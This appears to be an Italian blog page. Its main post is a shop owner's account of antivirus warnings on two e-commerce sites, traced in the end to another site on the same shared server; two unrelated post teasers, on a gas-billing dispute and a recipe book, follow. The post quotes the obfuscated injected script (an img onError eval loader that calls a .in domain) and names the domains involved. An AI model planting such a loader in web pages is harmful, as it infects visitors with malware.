In questi giorni mi sono arrivate un paio di notifiche da parte di utenti che aprendo due miei siti (negozi online per la precisione) l’antivirus scatta sull’attenti segnalando codice malevolo. Pensando che fosse qualcos’altro non ho dato molto peso, oggi però l’ho potuto vedere grazie ad uno screenshot.

C’è qualcosa che non va.. guardando sui webmaster tools di Google vedo che su un sito mi segnala una pagina contenente questo codice:

Purtroppo Google ha trovato codice dannoso sul tuo sito.

< img src=”about:blank” onError=’astro=unescape(“%27″);astru=
unescape(“%22″);sksa=eval(“document.getElementById(“+astro+”
seaid”+astro+”).src=unescape(“+astro+”%68%74%74%70%3A%2F%2F”
+astro+”)+document.getElementById(“+astro+”5550″+astro+”).id
+unescape(“+astro+”%2E%69%6E%2F”+astro+”)+”+astro+”129091371
2″+astro+”+unescape(“+astro+”%2E%70%68%70″+astro+”)”);docume
nt.getElementById(“seaid”).src=sksa’ style=”width:300;height
:300;border:0px;” >

mentre sul secondo sito mi dice che è tutto ok.

Facendo qualche ricerca trovo che questo codice è proprio la codifica di un url solitamente composto cosi xxxxx.in/xxxx.php che contiene codice malevolo e fa aprire 2 pdf infetti. Leggo inoltre che ha colpito molti blog su base wordpress.

Per caso ne hai sentito parlare?

Io nei miei due negozi online, creati con cms diversi (zen-cart e virtuemart) non riesco a trovare questo codice, inoltre ho guardato le date di ultima modifica dei file per capire se qualcuno avesse iniettato codice malevolo e non c’è niente di recente. Ho cercato veramente a fondo leggendo tutti i casi e cercando file dopo file eventuali stringhe nascoste, iframe o script, htaccess e file config,  ma niente! E’ tutto in ordine e pulito..

A me personalmente non è mai apparso niente navigandoci e comunque Google non da l’avviso di “sito che può danneggiare il tuo computer”; non so più dove guardare o cosa fare. Credo ci sia qualcosa, perchè avendo ricevuto segnalazioni diverse ho scartato l’idea di un falso positivo o di un problema sul pc con cui si naviga.

Hai qualche consiglio da darmi? esperienze simili? aiuti su dove potrebbe esserci un buco?

I due negozi sono bigiotteria e cosmetici la versione dei cms è piuttosto datata lo so, però sono le versioni stabili con relative patch; non le ho ancora aggiornate in quanto sono gli ultimi mesi di vita, presto lasceranno il posto ad un negozio tutto nuovo.

Per il momento non mi resta che aspettare l’aggiornamento dei dati in strumenti per webmaster di Google per vedere se lo ritrova.

Ogni consiglio sarà veramente di aiuto, grazie!

P.S.: Ho un buono adwords da 75 euro in più Potrebbe essere un regalo per chi risolve il caso

P.P.S.: Visitando i siti ricevete un allarme dal vostro antivirus? (se loa vete ovviamente)

UPDATE: Ancora oggi sono in alto mare.. ho potuto testarlo di persona; dopo il tad di chiusura </html> appare il codice postato sopra, richiama un file php che carica delle classi java, fa scaricare dei file pdf e fa partire il media player di windows. Un disastro insomma.

Vedo che il sito dannoso è 3737373.in o in-in.in, trattasi di Un Trojan-Downlaoder.java.openconnection.bu e un trojan Packed.Win32.Krap.ao

UPDATE RISOLUTIVO: Bene, trovata la soluzione. Il codice maligno non riuscivo a scovarlo semplicemente perchè non c’era. -.- Mi ha risposto il provider dicendo che han risolto; un sito ospitato sul mio stesso server stava infettando tutti gli altri.

Bene, anno nuovo server nuovo, passo ad un dedicato

Ho bisogno di urlare, ma per evitare che mi rinchiudano al manicomio scrivo..

(N.B.: l’articolo è venuto piuttosto lungo, se non hai voglia di leggerlo c’è un riassunto sul fondo )

Scrivo un articolo di protesta, di rabbia per condividere questo “stupro”, questa lesione dei diritti che ho subito da parte dell’azienda erogatrice di Gas: Enel Energia! L’energia che ti ascolta usano come slogan, altro non è che una presa in giro per il cliente, visto che non si può parlare, non si può fare niente, solo subire i loro casini e le loro lentezze burocratiche pagando di tasca nostra!

Ti racconto cosa mi è successo e capirai perchè ho usato questi termini e perchè ho il veleno che scorre nelle vene.

Da febbraio 2010 io e la mia ragazza abbiamo abbandonato il nido dei genitori per trasferirci in un appartamento; il mese di febbraio è servito per lavori vari, per richiedere le volture utenze e a Marzo 2010 siamo entrati. Quindi Marzo 2010 inizio uso gas.

Il contratto dell’enel energia mi è stato spedito a Settembre 2010 (scandalo) e nel frattempo, ovviamente, risultava ancora il vecchio coinquilino al quale è arrivata anche una bolletta; quindi me la gira e pago i primi 130 euro (circa) per il periodo febbraio-marzo 2010.

Poi il silenzio… fino a Novembre 2010.. panico e paura!
Continua a leggere… »

Ciao, voglio segnalarti la nascita di un libro.. io non ne apro 1 da molto tempo lo ammetto, solitamente leggo un blog o un pdf; la carta non mi ha mai preso particolarmente. Ma se ci troviamo in cucina, abbiamo fame, siamo stufi del solito piatto di pasta al pomodoro e non vogliamo mettere a rischio il nostro portatile?
Ecco che qui un libro di ricette completo è la cosa ideale!

L’idea nasce dal signor Riccardo aka Merlinox (un mio amico-collega 2.0), sempre in fermento a sfornare nuove idee tecnologiche; di seguito riporterò il comunicato stampa ufficiale, io per riassumere il tutto in linguaggio informatico direi:

“Merlinox ha creato un motore di ricerca 2.0 di ricette culinarie e lo ha stampato”
Continua a leggere… »